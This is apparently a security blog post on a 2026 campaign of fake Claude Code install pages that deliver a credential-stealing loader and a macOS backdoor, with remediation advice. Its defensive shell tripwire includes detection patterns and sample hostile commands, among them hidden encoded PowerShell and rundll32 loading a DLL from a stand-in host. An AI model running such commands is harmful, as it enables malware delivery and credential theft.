Tags: cybersecurity, developer tools, malware

Fake Claude Code Installers Are Stealing Your API Keys

June 4, 2026

If you searched "install Claude Code" or "download Claude Code" any time since March 2026 and clicked the top result — there's a chance you hit a fake page.

Threat actors built a network of more than 88 fake installation pages, purchased Google Ads to push them above legitimate documentation in search results, and used them to deliver credential-stealing malware that never writes a file to your hard drive. As of May 14, 2026, 32 of those fake domains were still live and serving malicious content. Ten new ones emerged while researchers were writing up their findings.

This isn't a low-effort phishing campaign. It's targeted, technically sophisticated, and still running.

How the Attack Works

The attack begins when a developer searches for terms like "install Claude Code" or "Claude Code CLI." Attackers purchase sponsored ads that appear above legitimate results, redirecting victims to convincing lookalike websites that closely mimic official Claude documentation pages.

The fake page tells users to install Claude Code by pasting terminal commands, with separate variants for macOS and Windows. Anyone used to installing developer tools this way is likely to copy and run them without a second look, and that is exactly when the infection chain starts.

The malicious commands are hidden inside instructions that look like a normal install, and they usually do not break the expected install process: Claude Code itself may install correctly, so nothing looks wrong afterwards.

What Gets Stolen

This isn't a generic infostealer; it was built for AI developer environments. The researchers who analysed it describe it as the first infostealer written specifically to harvest API keys from AI coding assistants such as Cline and Continue.dev, on top of the usual browser and crypto-wallet targets.

Once executed, the pasted command launches an obfuscated loader: PowerShell on Windows, a shell script on macOS. The malware targets Chromium-based browsers including Chrome, Edge, Brave, Opera, Arc, Vivaldi and others, extracting the keys those browsers use to encrypt their credential stores, along with authentication tokens, saved passwords, session cookies and, in some cases, stored payment information.

On macOS, it installs a backdoor capable of spawning remote shells and executing attacker-controlled commands.

Why It's Hard to Take Down

The campaign's crypto-clipper component uses a Binance Smart Chain smart contract as its command-and-control channel. There is no C2 domain to seize and no server to shut off.

When one fake domain gets flagged, another goes up. The operation rotates infrastructure continuously, allowing malicious sites to quickly reappear after takedowns. Ten new GitHub Pages domains appeared during Straiker's own analysis window.

The attackers most likely ran the Google Ads through compromised legitimate advertiser accounts, which is how the campaign passed ad review. That's why the ads look real: the ad account behind them was real.

Who Else Is Targeted

Claude Code is the headline, but it's not the only tool being impersonated. The campaign has targeted users of Claude Code, Cline, JetBrains, Snowflake, and Perplexity Comet since March 2026.

If you install AI developer tools by searching Google and clicking the top result, you're in the target group.

What to Do Right Now

Check if you're affected:

  • Look for unexpected API usage on your Anthropic, OpenAI, or other AI provider dashboards
  • Check for unknown active sessions in your cloud accounts (AWS, GCP, Azure, Snowflake)
  • If you ran a terminal command from a search result recently, treat the credentials saved in Chrome, Edge, Brave and other Chromium browsers as compromised: rotate them and sign out of active sessions, since session cookies are among the stolen data

Going forward:

A legitimate install one-liner won't invoke rundll32.exe or mshta, and it won't load DLLs from UNC paths. If an install command looks even slightly off, stop.
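As an added example (not code from the original post, and not a tool from any of the cited vendors), here is a small POSIX shell tripwire that applies the red flags above to a pasted command and to a shell history file, which also covers the "check if you're affected" step. The indicator list is an assumption built from the post's own red flags (rundll32, mshta, DLLs from UNC paths, obfuscated PowerShell) plus a few common companions (regsvr32, encoded PowerShell, Invoke-Expression, hidden windows); it is not complete. The history excerpt the demo runs on is constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original post or any vendor. The indicator
# list below is an assumption: the post's own red flags plus a few related
# ones. It is a tripwire, not a complete detector.

# check_install_cmd CMD
#   Exit 0 if no indicator matches, 1 otherwise (matches listed on stderr).
check_install_cmd() {
    cmd="$1"
    hits=""
    # Extended regexes, matched case-insensitively with grep -E -i.
    for pat in \
        'rundll32' \
        'mshta' \
        'regsvr32' \
        '\\\\[A-Za-z0-9._-]+\\' \
        '(^|[^A-Za-z])-(enc|encodedcommand|ec)([^A-Za-z]|$)' \
        'frombase64string' \
        '(^|[^A-Za-z])iex([^A-Za-z]|$)' \
        'invoke-expression' \
        'windowstyle +hidden'
    do
        if printf '%s\n' "$cmd" | grep -Eiq -- "$pat"; then
            hits="${hits:+$hits ; }$pat"
        fi
    done
    if [ -n "$hits" ]; then
        printf 'SUSPICIOUS: %s\n' "$hits" >&2
        return 1
    fi
    return 0
}

# scan_history < HISTORY_FILE
#   Prints every flagged command and returns how many were flagged.
#   Strips the ": <epoch>:<secs>;" prefix that zsh EXTENDED_HISTORY adds.
scan_history() {
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        line="${line#: [0-9]*;}"
        [ -z "$line" ] && continue
        if ! check_install_cmd "$line" 2>/dev/null; then
            printf '%s\n' "$line"
            n=$((n + 1))
        fi
    done
    return "$n"
}

# demo: runs scan_history over a constructed history excerpt (made up for
# this example). Two of the four entries are flagged; the curl|bash line is
# deliberately not, because legitimate installers use that shape too.
demo() {
    printf '%s\n' \
        ': 1717000000:0;curl -fsSL https://example.invalid/install.sh | bash' \
        ': 1717000100:0;powershell -WindowStyle Hidden -enc SQBFAFgA' \
        ': 1717000200:0;rundll32 \\evil.invalid\share\x.dll,Run' \
        ': 1717000300:0;git status' |
    scan_history
}
```

On macOS, run `check_install_cmd "$(pbpaste)"` before executing anything copied from a web page, and `scan_history < ~/.zsh_history` (or `~/.bash_history`) as part of the check above. A clean result means the tripwire did not fire, not that the command is safe: `curl ... | sh` is left unflagged on purpose, since the official installers use that shape, so read the URL and the script before you run it.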

Never install developer tools from a Google Ad. Navigate directly to the official documentation. For Claude Code, that's claude.ai/code. Bookmark it.

Rotate your API keys if you have any doubt. It takes two minutes and makes whatever was stolen worthless. It does not remove the macOS backdoor described above, though: if you actually ran one of these commands, treat the machine as compromised, not just the keys.

This attack pattern is exactly what the LLM-driven cyberattack Sysdig documented last month showed us: developers are the target. AI credentials are the prize. The attack surface is growing faster than most teams are tracking it.

Sources: Straiker, Bitdefender, TechRepublic, Trend Micro